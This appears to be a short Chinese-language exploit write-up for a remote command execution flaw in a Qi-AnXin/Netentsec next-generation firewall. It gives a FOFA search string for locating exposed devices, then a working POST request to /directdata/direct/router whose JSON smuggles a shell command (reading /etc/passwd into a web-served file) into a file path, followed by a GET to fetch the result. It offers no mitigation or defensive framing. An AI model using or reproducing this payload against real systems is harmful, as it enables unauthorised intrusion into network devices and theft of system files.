奇安信 网康下一代防火墙 RCE

漏洞概述

存在远程命令执行，漏洞攻击者可以获取服务器权限。

FOFA

app="网康科技-下一代防火墙"

漏洞复现

进入登录页面抓包

 

 

 

 构造数据包

变更发包方式：POST /directdata/direct/router HTTP/1.1
添加POST数据：{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

 

 

 构造数据包

变更发包方式：GET /test.txt HTTP/1.1